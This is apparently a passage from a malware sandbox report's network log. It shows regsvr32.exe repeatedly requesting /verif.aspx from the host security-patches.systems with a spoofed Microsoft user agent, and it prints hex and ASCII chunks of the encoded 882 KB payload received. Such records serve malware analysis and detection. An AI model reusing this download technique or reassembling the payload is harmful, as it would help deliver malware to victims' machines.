/wPfq31WlFwXLg4fNQ6NAmyYeduBz531u/Ld+wFPlUykrFYka/6hDSHP0Oza6e3M9fhp3M2uw9tMiH6741n6q1vO0Gza6e3N9Xhp3M2uQ1tMiHMlvV5V1auvVKz66evW08h531FJ1Dx7pQnsyuMD9auu3iya6eB8F6iIr4dWJVw7IknMyu6tAWyYedutQ5q7XIvifPRuoYurS5IrhA6MAeyoeduBBl3M9vhZ3M2ihdw7okn8yu7MAey
2024-12-06 21:12:10 UTC	16384	IN	Data Raw: 62 57 53 52 6b 31 70 62 64 53 43 4b 67 43 64 69 56 63 46 36 68 4f 70 79 4d 65 6f 51 74 72 79 64 50 2f 46 56 59 5a 6d 47 2b 37 51 33 75 4c 33 69 75 57 61 2b 4e 5a 36 34 46 47 6e 63 44 38 50 7a 0d 0a 4c 38 66 59 4c 49 48 42 59 6f 54 72 5a 71 48 71 45 4c 71 2b 50 5a 71 34 48 4a 6d 53 53 7a 64 34 59 6a 50 61 4e 4b 32 4e 64 58 78 69 4d 31 46 68 33 67 38 2f 38 32 71 36 48 49 33 65 48 39 76 78 0d 0a 4e 39 76 63 4a 4c 33 44 63 71 54 70 66 6c 6e 71 52 4d 45 31 38 53 66 58 32 69 79 78 77 33 71 59 37 32 61 78 36 41 43 53 76 44 32 2b 75 46 6b 77 33 68 2f 76 38 32 42 6a 32 69 79 70 6f 68 6d 62 0d 0a 6e 4d 7a 61 4a 4b 6e 42 30 69 57 67 4e 31 47 74 6d 59 62 37 74 44 65 34 76 65 4b 35 58 72 34 31 6e 72 67 55 6e 64 77 50 77 2f 4d 76 78 39 67 73 72 63 46 69 67 4b 55 78 55 Data Ascii: bWSRk1pbdSCKgCdiVcF6hOpyMeoQtrydP/FVYZmG+7Q3uL3iuWa+NZ64FGncD8PzL8fYLIHBYoTrZqHqELq+PZq4HJmSSzd4YjPaNK2NdXxiM1Fh3g8/82q6HI3eH9vxN9vcJL3DcqTpflnqRME18SfX2iyxw3qY72ax6ACSvD2+uFkw3h/v82Bj2iypohmbnMzaJKnB0iWgN1GtmYb7tDe4veK5Xr41nrgUndwPw/Mvx9gsrcFigKUxU
2024-12-06 21:12:10 UTC	16384	IN	Data Raw: 58 49 31 79 76 47 4d 7a 55 57 47 2b 54 66 41 39 70 6a 4e 52 59 56 58 41 63 72 79 4c 47 46 42 68 56 61 4d 54 65 57 49 7a 30 52 79 6d 54 45 49 35 0d 0a 34 6b 36 6a 5a 69 42 78 76 44 56 71 75 42 42 70 33 68 73 37 38 36 72 62 6d 77 5a 52 53 72 77 31 62 6c 56 65 54 78 52 43 71 49 36 6d 64 79 74 6f 6b 67 2f 33 65 57 49 7a 55 59 70 53 6a 58 4b 34 0d 0a 59 6a 4e 52 59 64 38 50 39 35 47 47 4d 31 46 68 76 4a 63 33 65 47 4b 7a 4c 4a 4a 53 50 33 54 34 48 38 46 58 46 47 6a 42 59 6e 54 70 65 56 6e 71 42 30 62 66 2f 51 55 33 55 65 6f 51 51 73 56 33 0d 0a 63 6e 74 5a 42 31 70 6b 2f 2b 65 55 39 78 55 62 58 49 31 79 78 47 4d 7a 55 57 47 2b 54 66 41 39 33 6a 4e 52 59 56 58 41 63 73 53 4c 71 46 46 68 56 61 4f 6a 65 47 49 7a 30 52 79 6d 54 45 49 39 0d 0a 34 6b 36 6a 5a 43 42 Data Ascii: XI1yvGMzUWG+TfA9pjNRYVXAcryLGFBhVaMTeWIz0RymTEI54k6jZiBxvDVquBBp3hs786rbmwZRSrw1blVeTxRCqI6mdytokg/3eWIzUYpSjXK4YjNRYd8P95GGM1FhvJc3eGKzLJJSP3T4H8FXFGjBYnTpeVnqB0bf/QU3UeoQQsV3cntZB1pk/+eU9xUbXI1yxGMzUWG+TfA93jNRYVXAcsSLqFFhVaOjeGIz0RymTEI94k6jZCB

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49945	185.234.216.175	443	6748	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-06 21:13:08 UTC	117	OUT	GET /verif.aspx HTTP/1.1 User-Agent: Microsoft-WNS/11.0 Host: security-patches.systems Cache-Control: no-cache
2024-12-06 21:13:09 UTC	252	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:13:09 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Sat, 23 Nov 2024 15:29:11 GMT ETag: "d75c4-62796294faafa" Accept-Ranges: bytes Content-Length: 882116 Connection: close
2024-12-06 21:13:09 UTC	7940	IN	Data Raw: 4c 32 6e 42 59 56 5a 4b 4e 33 68 6d 4d 31 46 68 71 72 55 33 65 4e 6f 7a 55 57 46 56 53 6a 64 34 49 6a 4e 52 59 56 56 4b 4e 33 68 69 4d 31 46 68 56 55 6f 33 65 47 49 7a 55 57 46 56 53 6a 64 34 0d 0a 59 6a 4e 52 59 56 56 4b 4e 33 68 69 4d 31 46 68 58 55 73 33 65 47 77 73 36 32 39 56 2f 6a 36 31 51 34 74 51 4c 5a 68 72 59 78 41 4c 51 48 45 52 4a 79 56 51 43 67 4e 65 63 51 49 30 4a 46 6b 58 0d 0a 46 68 4d 7a 42 48 55 34 51 68 5a 43 57 6a 39 42 45 51 56 6b 57 41 39 63 4e 51 52 37 52 7a 70 79 52 6a 4e 52 59 56 56 4b 4e 33 68 48 2f 76 68 4f 4e 4f 62 77 42 41 4f 66 6c 68 30 30 35 76 41 45 0d 0a 30 4f 32 56 48 44 2f 6d 38 41 54 51 37 5a 4d 63 6c 65 62 77 42 41 55 65 6b 68 77 6b 35 76 41 45 42 52 36 56 48 43 48 6d 38 41 54 51 37 5a 49 63 49 75 62 77 42 41 55 65 6b Data Ascii: L2nBYVZKN3hmM1FhqrU3eNozUWFVSjd4IjNRYVVKN3hiM1FhVUo3eGIzUWFVSjd4YjNRYVVKN3hiM1FhXUs3eGws629V/j61Q4tQLZhrYxALQHERJyVQCgNecQI0JFkXFhMzBHU4QhZCWj9BEQVkWA9cNQR7RzpyRjNRYVVKN3hH/vhONObwBAOflh005vAE0O2VHD/m8ATQ7ZMclebwBAUekhwk5vAEBR6VHCHm8ATQ7ZIcIubwBAUek
2024-12-06 21:13:09 UTC	16384	IN	Data Raw: 2b 36 59 2f 32 69 79 70 6f 6c 46 35 59 54 50 61 4a 4b 6e 42 30 69 57 67 4e 31 47 74 6d 59 62 37 74 4b 37 2f 6e 61 32 5a 68 76 75 30 0d 0a 4e 37 69 39 34 72 6c 69 76 6a 57 65 41 4a 48 71 47 4c 61 2b 65 65 74 79 56 65 67 55 51 72 77 74 6e 76 51 54 5a 56 52 4b 4e 33 6a 70 64 71 32 6d 46 55 49 32 65 47 49 7a 32 69 79 70 6a 54 61 63 0d 0a 38 54 74 42 36 67 42 47 76 69 32 4b 75 42 52 70 33 41 2f 54 38 79 2f 50 30 71 42 5a 77 33 71 55 36 57 61 39 36 41 43 79 76 44 32 4b 75 68 53 42 33 67 66 54 38 53 2f 76 32 6a 53 31 77 54 58 78 0d 0a 4a 2b 76 61 4c 49 6e 42 4a 76 45 33 78 39 6f 6b 72 59 30 33 2f 42 51 37 51 65 6f 59 73 76 42 35 69 6b 56 5a 63 64 34 66 7a 2f 4d 6e 78 39 67 6a 55 63 6c 4b 6a 47 4a 47 57 4b 59 51 75 6a 64 34 0d 0a 59 6a 4f 36 61 4e 34 48 77 33 73 Data Ascii: +6Y/2iypolF5YTPaJKnB0iWgN1GtmYb7tK7/na2Zhvu0N7i94rlivjWeAJHqGLa+eetyVegUQrwtnvQTZVRKN3jpdq2mFUI2eGIz2iypjTac8TtB6gBGvi2KuBRp3A/T8y/P0qBZw3qU6Wa96ACyvD2KuhSB3gfT8S/v2jS1wTXxJ+vaLInBJvE3x9okrY03/BQ7QeoYsvB5ikVZcd4fz/Mnx9gjUclKjGJGWKYQujd4YjO6aN4Hw3s
2024-12-06 21:13:09 UTC	16384	IN	Data Raw: 36 51 43 30 4f 4d 34 6e 7a 64 53 68 49 52 48 77 50 62 6f 7a 55 57 46 56 77 58 70 6f 0d 0a 36 33 36 39 36 67 42 47 76 69 32 53 75 42 53 52 33 41 2f 37 38 79 2f 66 32 43 79 46 78 32 4b 30 36 32 61 78 70 68 43 65 4e 33 68 69 4d 39 6f 6b 64 63 4e 79 6e 4f 6c 2b 54 65 67 59 6f 72 77 74 0d 0a 69 72 6f 45 70 64 34 50 30 2f 45 6e 2b 39 77 73 6b 63 4e 36 70 4f 6c 6d 73 54 50 65 42 2b 75 51 52 67 35 51 59 62 78 64 79 49 65 64 75 42 52 70 33 67 63 72 38 7a 63 54 32 47 6e 63 47 6a 50 7a 0d 0a 4a 7a 76 61 68 41 69 4a 2b 37 53 75 2f 35 32 74 6d 59 62 37 74 44 65 34 76 54 79 57 68 76 75 30 72 76 2b 64 72 5a 6d 47 2b 37 51 33 75 4c 30 77 76 6b 4f 38 50 57 71 77 6b 58 48 63 44 7a 2f 7a 0d 0a 4c 7a 74 71 4c 46 6b 2b 41 50 4d 33 4f 39 67 30 71 63 46 36 68 49 6f 59 67 32 4e Data Ascii: 6QC0OM4nzdShIRHwPbozUWFVwXpo63696gBGvi2SuBSR3A/78y/f2CyFx2K062axphCeN3hiM9okdcNynOl+TegYorwtiroEpd4P0/En+9wskcN6pOlmsTPeB+uQRg5QYbxdyIeduBRp3gcr8zcT2GncGjPzJzvahAiJ+7Su/52tmYb7tDe4vTyWhvu0rv+drZmG+7Q3uL0wvkO8PWqwkXHcDz/zLztqLFk+APM3O9g0qcF6hIoYg2N
2024-12-06 21:13:09 UTC	16384	IN	Data Raw: 61 4f 75 6d 51 5a 36 71 74 62 37 39 0d 0a 64 73 79 75 6e 72 35 44 76 44 58 36 73 4c 68 67 33 41 65 76 2b 78 2b 72 55 52 64 4c 78 36 4a 6f 6e 63 79 75 36 4d 44 36 79 59 65 64 50 4f 63 6b 54 52 71 38 39 64 4c 4e 72 70 36 39 64 53 5a 35 0d 0a 59 74 69 43 36 74 68 61 79 49 65 64 75 4d 52 31 71 72 58 49 38 65 39 37 72 35 36 71 77 36 49 30 6e 4d 79 75 36 74 41 43 79 59 65 64 75 4e 77 74 71 37 58 49 38 53 63 2f 32 43 78 46 6a 58 4b 67 0d 0a 59 6a 4e 52 59 62 79 78 4e 33 68 69 76 73 52 42 71 37 58 49 38 54 65 6e 32 69 54 42 77 37 4a 41 6e 63 79 75 36 68 6a 65 74 41 46 32 50 43 64 74 6b 73 38 4c 68 35 33 4d 55 47 46 56 53 74 78 79 0d 0a 70 62 5a 74 6e 71 71 31 4e 33 68 69 4d 39 76 30 61 62 58 49 68 2b 70 6d 75 57 37 6a 44 39 2f 39 6f 6b 64 47 36 68 6a 65 76 47 6e Data Ascii: aOumQZ6qtb79dsyunr5DvDX6sLhg3Aev+x+rURdLx6Joncyu6MD6yYedPOckTRq89dLNrp69dSZ5YtiC6thayIeduMR1qrXI8e97r56qw6I0nMyu6tACyYeduNwtq7XI8Sc/2CxFjXKgYjNRYbyxN3hivsRBq7XI8Ten2iTBw7JAncyu6hjetAF2PCdtks8Lh53MUGFVStxypbZtnqq1N3hiM9v0abXIh+pmuW7jD9/9okdG6hjevGn
2024-12-06 21:13:09 UTC	16384	IN	Data Raw: 67 55 74 64 35 43 76 6a 4a 6d 39 42 53 64 56 55 6f 33 65 4f 6c 6d 57 65 67 41 68 72 77 39 7a 72 6f 55 73 64 34 48 35 2f 45 76 39 39 6f 30 6d 63 4e 69 6b 4f 6c 32 75 65 67 51 67 72 77 31 0d 0a 71 72 6f 63 30 64 67 66 78 53 72 70 64 72 6b 78 33 67 66 7a 6b 49 35 4f 72 70 34 2f 53 72 6f 31 79 6d 4b 35 6b 4e 32 31 79 50 75 6d 4f 31 37 58 68 63 2f 6c 44 58 56 62 52 31 31 56 53 6c 2b 49 0d 0a 46 44 74 42 43 65 33 47 50 32 69 4b 38 32 64 6e 56 63 6e 7a 64 4b 56 32 6b 57 46 56 53 6a 66 31 4c 35 2f 59 4c 4c 48 42 59 70 7a 70 4d 64 67 6b 36 63 46 36 6e 4f 6c 6d 6b 65 68 45 77 58 4c 45 0d 0a 36 33 62 70 36 68 6a 79 76 6a 58 57 39 42 53 64 71 72 58 49 68 2b 39 2b 2b 59 6d 64 6b 7a 64 34 36 58 62 6c 36 68 69 2b 55 2f 46 76 4d 31 46 68 56 63 48 53 4a 61 48 2f 6e 61 32 Data Ascii: gUtd5CvjJm9BSdVUo3eOlmWegAhrw9zroUsd4H5/Ev99o0mcNikOl2uegQgrw1qroc0dgfxSrpdrkx3gfzkI5Orp4/Sro1ymK5kN21yPumO17Xhc/lDXVbR11VSl+IFDtBCe3GP2iK82dnVcnzdKV2kWFVSjf1L5/YLLHBYpzpMdgk6cF6nOlmkehEwXLE63bp6hjyvjXW9BSdqrXIh+9++Ymdkzd46Xbl6hi+U/FvM1FhVcHSJaH/na2
2024-12-06 21:13:09 UTC	16384	IN	Data Raw: 58 49 68 2b 48 66 51 65 71 5a 77 35 4b 34 6e 4d 79 75 36 73 41 36 79 49 65 64 59 62 6b 34 4a 30 6f 33 38 79 66 44 32 6d 6d 39 4e 59 56 34 0d 0a 59 76 55 55 69 46 54 42 65 6f 6a 70 49 74 6a 30 50 62 58 49 68 2b 39 32 75 4f 6a 51 4a 73 69 48 6e 62 67 63 61 64 37 66 57 34 65 64 7a 4e 74 6a 33 55 75 36 39 51 72 4d 72 70 37 63 78 31 4f 48 0d 0a 6e 63 7a 61 4e 46 33 42 73 68 79 64 7a 4b 37 71 58 63 4e 39 66 4b 56 32 72 5a 36 71 74 63 6a 31 4c 2f 2b 35 73 42 4e 49 4e 33 66 55 5a 70 30 7a 32 41 66 6a 6b 43 61 34 55 32 48 65 44 7a 2b 52 0d 0a 69 44 64 52 59 64 34 50 78 2f 75 69 4e 39 6a 6b 4e 62 58 49 68 39 73 33 55 57 46 56 49 65 61 48 36 62 59 78 6e 71 71 31 4e 43 68 6d 75 73 51 39 71 72 58 49 38 2b 39 76 72 70 36 71 79 51 35 34 0d 0a 46 31 47 58 4a 4c 31 4b 38 Data Ascii: XIh+HfQeqZw5K4nMyu6sA6yIedYbk4J0o38yfD2mm9NYV4YvUUiFTBeojpItj0PbXIh+92uOjQJsiHnbgcad7fW4edzNtj3Uu69QrMrp7cx1OHnczaNF3BshydzK7qXcN9fKV2rZ6qtcj1L/+5sBNIN3fUZp0z2AfjkCa4U2HeDz+RiDdRYd4Px/uiN9jkNbXIh9s3UWFVIeaH6bYxnqq1NChmusQ9qrXI8+9vrp6qyQ54F1GXJL1K8
2024-12-06 21:13:09 UTC	16384	IN	Data Raw: 67 63 69 64 61 4c 50 35 42 75 58 56 46 68 33 67 66 66 6b 4d 59 72 55 32 48 65 42 38 76 7a 0d 0a 61 39 75 72 34 6c 56 4b 76 43 32 65 75 46 4f 49 4d 55 67 33 65 4f 6c 32 72 65 4b 56 54 72 34 39 70 6f 70 56 59 56 56 4b 58 4b 6d 64 75 42 53 6c 56 68 6f 7a 38 54 66 7a 32 69 79 56 77 53 62 78 0d 0a 4e 34 2f 61 4a 4f 6e 4b 44 33 6f 58 4f 70 59 6b 6a 55 73 33 65 47 4c 59 56 71 59 51 6b 6a 64 34 59 6a 50 62 4c 49 33 43 65 6f 70 74 68 51 53 54 30 4a 68 43 4a 2b 6c 32 72 65 4b 56 54 72 34 39 0d 0a 32 6f 70 56 59 56 56 4b 58 4b 6d 64 75 42 54 5a 56 68 6f 7a 38 54 65 48 32 69 7a 68 77 53 62 78 4e 34 50 61 4a 4f 58 4b 44 33 6b 58 4f 70 59 6b 67 55 73 33 65 47 4c 59 56 71 59 51 6e 6a 64 34 0d 0a 59 6a 50 62 4c 49 48 43 65 6f 6c 74 68 51 53 51 30 4a 68 43 62 77 6f 79 51 Data Ascii: gcidaLP5BuXVFh3gffkMYrU2HeB8vza9ur4lVKvC2euFOIMUg3eOl2reKVTr49popVYVVKXKmduBSlVhoz8Tfz2iyVwSbxN4/aJOnKD3oXOpYkjUs3eGLYVqYQkjd4YjPbLI3CeopthQST0JhCJ+l2reKVTr492opVYVVKXKmduBTZVhoz8TeH2izhwSbxN4PaJOXKD3kXOpYkgUs3eGLYVqYQnjd4YjPbLIHCeolthQSQ0JhCbwoyQ
2024-12-06 21:13:10 UTC	16384	IN	Data Raw: 2f 77 50 66 71 33 31 57 6c 46 77 58 4c 67 0d 0a 34 66 4e 51 36 4e 41 6d 79 59 65 64 75 42 7a 35 33 31 75 2f 4c 64 2b 77 46 50 6c 55 79 6b 72 46 59 6b 61 2f 36 68 44 53 48 50 30 4f 7a 61 36 65 33 4d 39 66 68 70 33 4d 32 75 77 39 74 4d 69 48 0d 0a 36 37 34 31 6e 36 71 31 76 4f 30 47 7a 61 36 65 33 4e 39 58 68 70 33 4d 32 75 51 31 74 4d 69 48 4d 6c 76 56 35 56 31 61 75 76 56 4b 7a 36 36 65 76 57 30 38 68 35 33 31 46 4a 31 44 78 37 70 51 0d 0a 6e 73 79 75 4d 44 39 61 75 75 33 69 79 61 36 65 42 38 46 36 69 49 72 34 64 57 4a 56 77 37 49 6b 6e 4d 79 75 36 74 41 57 79 59 65 64 75 74 51 35 71 37 58 49 76 69 66 50 52 75 6f 59 75 72 53 35 0d 0a 49 72 68 41 36 4d 41 65 79 6f 65 64 75 42 42 6c 33 4d 39 76 68 5a 33 4d 32 69 68 64 77 37 6f 6b 6e 38 79 75 37 4d 41 65 79 Data Ascii: /wPfq31WlFwXLg4fNQ6NAmyYeduBz531u/Ld+wFPlUykrFYka/6hDSHP0Oza6e3M9fhp3M2uw9tMiH6741n6q1vO0Gza6e3N9Xhp3M2uQ1tMiHMlvV5V1auvVKz66evW08h531FJ1Dx7pQnsyuMD9auu3iya6eB8F6iIr4dWJVw7IknMyu6tAWyYedutQ5q7XIvifPRuoYurS5IrhA6MAeyoeduBBl3M9vhZ3M2ihdw7okn8yu7MAey
2024-12-06 21:13:10 UTC	16384	IN	Data Raw: 62 57 53 52 6b 31 70 62 64 53 43 4b 67 43 64 69 56 63 46 36 68 4f 70 79 4d 65 6f 51 74 72 79 64 50 2f 46 56 59 5a 6d 47 2b 37 51 33 75 4c 33 69 75 57 61 2b 4e 5a 36 34 46 47 6e 63 44 38 50 7a 0d 0a 4c 38 66 59 4c 49 48 42 59 6f 54 72 5a 71 48 71 45 4c 71 2b 50 5a 71 34 48 4a 6d 53 53 7a 64 34 59 6a 50 61 4e 4b 32 4e 64 58 78 69 4d 31 46 68 33 67 38 2f 38 32 71 36 48 49 33 65 48 39 76 78 0d 0a 4e 39 76 63 4a 4c 33 44 63 71 54 70 66 6c 6e 71 52 4d 45 31 38 53 66 58 32 69 79 78 77 33 71 59 37 32 61 78 36 41 43 53 76 44 32 2b 75 46 6b 77 33 68 2f 76 38 32 42 6a 32 69 79 70 6f 68 6d 62 0d 0a 6e 4d 7a 61 4a 4b 6e 42 30 69 57 67 4e 31 47 74 6d 59 62 37 74 44 65 34 76 65 4b 35 58 72 34 31 6e 72 67 55 6e 64 77 50 77 2f 4d 76 78 39 67 73 72 63 46 69 67 4b 55 78 55 Data Ascii: bWSRk1pbdSCKgCdiVcF6hOpyMeoQtrydP/FVYZmG+7Q3uL3iuWa+NZ64FGncD8PzL8fYLIHBYoTrZqHqELq+PZq4HJmSSzd4YjPaNK2NdXxiM1Fh3g8/82q6HI3eH9vxN9vcJL3DcqTpflnqRME18SfX2iyxw3qY72ax6ACSvD2+uFkw3h/v82Bj2iypohmbnMzaJKnB0iWgN1GtmYb7tDe4veK5Xr41nrgUndwPw/Mvx9gsrcFigKUxU
2024-12-06 21:13:10 UTC	16384	IN	Data Raw: 58 49 31 79 76 47 4d 7a 55 57 47 2b 54 66 41 39 70 6a 4e 52 59 56 58 41 63 72 79 4c 47 46 42 68 56 61 4d 54 65 57 49 7a 30 52 79 6d 54 45 49 35 0d 0a 34 6b 36 6a 5a 69 42 78 76 44 56 71 75 42 42 70 33 68 73 37 38 36 72 62 6d 77 5a 52 53 72 77 31 62 6c 56 65 54 78 52 43 71 49 36 6d 64 79 74 6f 6b 67 2f 33 65 57 49 7a 55 59 70 53 6a 58 4b 34 0d 0a 59 6a 4e 52 59 64 38 50 39 35 47 47 4d 31 46 68 76 4a 63 33 65 47 4b 7a 4c 4a 4a 53 50 33 54 34 48 38 46 58 46 47 6a 42 59 6e 54 70 65 56 6e 71 42 30 62 66 2f 51 55 33 55 65 6f 51 51 73 56 33 0d 0a 63 6e 74 5a 42 31 70 6b 2f 2b 65 55 39 78 55 62 58 49 31 79 78 47 4d 7a 55 57 47 2b 54 66 41 39 33 6a 4e 52 59 56 58 41 63 73 53 4c 71 46 46 68 56 61 4f 6a 65 47 49 7a 30 52 79 6d 54 45 49 39 0d 0a 34 6b 36 6a 5a 43 42 Data Ascii: XI1yvGMzUWG+TfA9pjNRYVXAcryLGFBhVaMTeWIz0RymTEI54k6jZiBxvDVquBBp3hs786rbmwZRSrw1blVeTxRCqI6mdytokg/3eWIzUYpSjXK4YjNRYd8P95GGM1FhvJc3eGKzLJJSP3T4H8FXFGjBYnTpeVnqB0bf/QU3UeoQQsV3cntZB1pk/+eU9xUbXI1yxGMzUWG+TfA93jNRYVXAcsSLqFFhVaOjeGIz0RymTEI94k6jZCB

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	50098	185.234.216.175	443	984	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-06 21:14:09 UTC	117	OUT	GET /verif.aspx HTTP/1.1 User-Agent: Microsoft-WNS/11.0 Host: security-patches.systems Cache-Control: no-cache
2024-12-06 21:14:10 UTC	252	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:14:09 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Sat, 23 Nov 2024 15:29:11 GMT ETag: "d75c4-62796294faafa" Accept-Ranges: bytes Content-Length: 882116 Connection: close
2024-12-06 21:14:10 UTC	7940	IN	Data Raw: 4c 32 6e 42 59 56 5a 4b 4e 33 68 6d 4d 31 46 68 71 72 55 33 65 4e 6f 7a 55 57 46 56 53 6a 64 34 49 6a 4e 52 59 56 56 4b 4e 33 68 69 4d 31 46 68 56 55 6f 33 65 47 49 7a 55 57 46 56 53 6a 64 34 0d 0a 59 6a 4e 52 59 56 56 4b 4e 33 68 69 4d 31 46 68 58 55 73 33 65 47 77 73 36 32 39 56 2f 6a 36 31 51 34 74 51 4c 5a 68 72 59 78 41 4c 51 48 45 52 4a 79 56 51 43 67 4e 65 63 51 49 30 4a 46 6b 58 0d 0a 46 68 4d 7a 42 48 55 34 51 68 5a 43 57 6a 39 42 45 51 56 6b 57 41 39 63 4e 51 52 37 52 7a 70 79 52 6a 4e 52 59 56 56 4b 4e 33 68 48 2f 76 68 4f 4e 4f 62 77 42 41 4f 66 6c 68 30 30 35 76 41 45 0d 0a 30 4f 32 56 48 44 2f 6d 38 41 54 51 37 5a 4d 63 6c 65 62 77 42 41 55 65 6b 68 77 6b 35 76 41 45 42 52 36 56 48 43 48 6d 38 41 54 51 37 5a 49 63 49 75 62 77 42 41 55 65 6b Data Ascii: L2nBYVZKN3hmM1FhqrU3eNozUWFVSjd4IjNRYVVKN3hiM1FhVUo3eGIzUWFVSjd4YjNRYVVKN3hiM1FhXUs3eGws629V/j61Q4tQLZhrYxALQHERJyVQCgNecQI0JFkXFhMzBHU4QhZCWj9BEQVkWA9cNQR7RzpyRjNRYVVKN3hH/vhONObwBAOflh005vAE0O2VHD/m8ATQ7ZMclebwBAUekhwk5vAEBR6VHCHm8ATQ7ZIcIubwBAUek
2024-12-06 21:14:10 UTC	16384	IN	Data Raw: 2b 36 59 2f 32 69 79 70 6f 6c 46 35 59 54 50 61 4a 4b 6e 42 30 69 57 67 4e 31 47 74 6d 59 62 37 74 4b 37 2f 6e 61 32 5a 68 76 75 30 0d 0a 4e 37 69 39 34 72 6c 69 76 6a 57 65 41 4a 48 71 47 4c 61 2b 65 65 74 79 56 65 67 55 51 72 77 74 6e 76 51 54 5a 56 52 4b 4e 33 6a 70 64 71 32 6d 46 55 49 32 65 47 49 7a 32 69 79 70 6a 54 61 63 0d 0a 38 54 74 42 36 67 42 47 76 69 32 4b 75 42 52 70 33 41 2f 54 38 79 2f 50 30 71 42 5a 77 33 71 55 36 57 61 39 36 41 43 79 76 44 32 4b 75 68 53 42 33 67 66 54 38 53 2f 76 32 6a 53 31 77 54 58 78 0d 0a 4a 2b 76 61 4c 49 6e 42 4a 76 45 33 78 39 6f 6b 72 59 30 33 2f 42 51 37 51 65 6f 59 73 76 42 35 69 6b 56 5a 63 64 34 66 7a 2f 4d 6e 78 39 67 6a 55 63 6c 4b 6a 47 4a 47 57 4b 59 51 75 6a 64 34 0d 0a 59 6a 4f 36 61 4e 34 48 77 33 73 Data Ascii: +6Y/2iypolF5YTPaJKnB0iWgN1GtmYb7tK7/na2Zhvu0N7i94rlivjWeAJHqGLa+eetyVegUQrwtnvQTZVRKN3jpdq2mFUI2eGIz2iypjTac8TtB6gBGvi2KuBRp3A/T8y/P0qBZw3qU6Wa96ACyvD2KuhSB3gfT8S/v2jS1wTXxJ+vaLInBJvE3x9okrY03/BQ7QeoYsvB5ikVZcd4fz/Mnx9gjUclKjGJGWKYQujd4YjO6aN4Hw3s
2024-12-06 21:14:10 UTC	16384	IN	Data Raw: 36 51 43 30 4f 4d 34 6e 7a 64 53 68 49 52 48 77 50 62 6f 7a 55 57 46 56 77 58 70 6f 0d 0a 36 33 36 39 36 67 42 47 76 69 32 53 75 42 53 52 33 41 2f 37 38 79 2f 66 32 43 79 46 78 32 4b 30 36 32 61 78 70 68 43 65 4e 33 68 69 4d 39 6f 6b 64 63 4e 79 6e 4f 6c 2b 54 65 67 59 6f 72 77 74 0d 0a 69 72 6f 45 70 64 34 50 30 2f 45 6e 2b 39 77 73 6b 63 4e 36 70 4f 6c 6d 73 54 50 65 42 2b 75 51 52 67 35 51 59 62 78 64 79 49 65 64 75 42 52 70 33 67 63 72 38 7a 63 54 32 47 6e 63 47 6a 50 7a 0d 0a 4a 7a 76 61 68 41 69 4a 2b 37 53 75 2f 35 32 74 6d 59 62 37 74 44 65 34 76 54 79 57 68 76 75 30 72 76 2b 64 72 5a 6d 47 2b 37 51 33 75 4c 30 77 76 6b 4f 38 50 57 71 77 6b 58 48 63 44 7a 2f 7a 0d 0a 4c 7a 74 71 4c 46 6b 2b 41 50 4d 33 4f 39 67 30 71 63 46 36 68 49 6f 59 67 32 4e Data Ascii: 6QC0OM4nzdShIRHwPbozUWFVwXpo63696gBGvi2SuBSR3A/78y/f2CyFx2K062axphCeN3hiM9okdcNynOl+TegYorwtiroEpd4P0/En+9wskcN6pOlmsTPeB+uQRg5QYbxdyIeduBRp3gcr8zcT2GncGjPzJzvahAiJ+7Su/52tmYb7tDe4vTyWhvu0rv+drZmG+7Q3uL0wvkO8PWqwkXHcDz/zLztqLFk+APM3O9g0qcF6hIoYg2N
2024-12-06 21:14:10 UTC	16384	IN	Data Raw: 61 4f 75 6d 51 5a 36 71 74 62 37 39 0d 0a 64 73 79 75 6e 72 35 44 76 44 58 36 73 4c 68 67 33 41 65 76 2b 78 2b 72 55 52 64 4c 78 36 4a 6f 6e 63 79 75 36 4d 44 36 79 59 65 64 50 4f 63 6b 54 52 71 38 39 64 4c 4e 72 70 36 39 64 53 5a 35 0d 0a 59 74 69 43 36 74 68 61 79 49 65 64 75 4d 52 31 71 72 58 49 38 65 39 37 72 35 36 71 77 36 49 30 6e 4d 79 75 36 74 41 43 79 59 65 64 75 4e 77 74 71 37 58 49 38 53 63 2f 32 43 78 46 6a 58 4b 67 0d 0a 59 6a 4e 52 59 62 79 78 4e 33 68 69 76 73 52 42 71 37 58 49 38 54 65 6e 32 69 54 42 77 37 4a 41 6e 63 79 75 36 68 6a 65 74 41 46 32 50 43 64 74 6b 73 38 4c 68 35 33 4d 55 47 46 56 53 74 78 79 0d 0a 70 62 5a 74 6e 71 71 31 4e 33 68 69 4d 39 76 30 61 62 58 49 68 2b 70 6d 75 57 37 6a 44 39 2f 39 6f 6b 64 47 36 68 6a 65 76 47 6e Data Ascii: aOumQZ6qtb79dsyunr5DvDX6sLhg3Aev+x+rURdLx6Joncyu6MD6yYedPOckTRq89dLNrp69dSZ5YtiC6thayIeduMR1qrXI8e97r56qw6I0nMyu6tACyYeduNwtq7XI8Sc/2CxFjXKgYjNRYbyxN3hivsRBq7XI8Ten2iTBw7JAncyu6hjetAF2PCdtks8Lh53MUGFVStxypbZtnqq1N3hiM9v0abXIh+pmuW7jD9/9okdG6hjevGn
2024-12-06 21:14:10 UTC	16384	IN	Data Raw: 67 55 74 64 35 43 76 6a 4a 6d 39 42 53 64 56 55 6f 33 65 4f 6c 6d 57 65 67 41 68 72 77 39 7a 72 6f 55 73 64 34 48 35 2f 45 76 39 39 6f 30 6d 63 4e 69 6b 4f 6c 32 75 65 67 51 67 72 77 31 0d 0a 71 72 6f 63 30 64 67 66 78 53 72 70 64 72 6b 78 33 67 66 7a 6b 49 35 4f 72 70 34 2f 53 72 6f 31 79 6d 4b 35 6b 4e 32 31 79 50 75 6d 4f 31 37 58 68 63 2f 6c 44 58 56 62 52 31 31 56 53 6c 2b 49 0d 0a 46 44 74 42 43 65 33 47 50 32 69 4b 38 32 64 6e 56 63 6e 7a 64 4b 56 32 6b 57 46 56 53 6a 66 31 4c 35 2f 59 4c 4c 48 42 59 70 7a 70 4d 64 67 6b 36 63 46 36 6e 4f 6c 6d 6b 65 68 45 77 58 4c 45 0d 0a 36 33 62 70 36 68 6a 79 76 6a 58 57 39 42 53 64 71 72 58 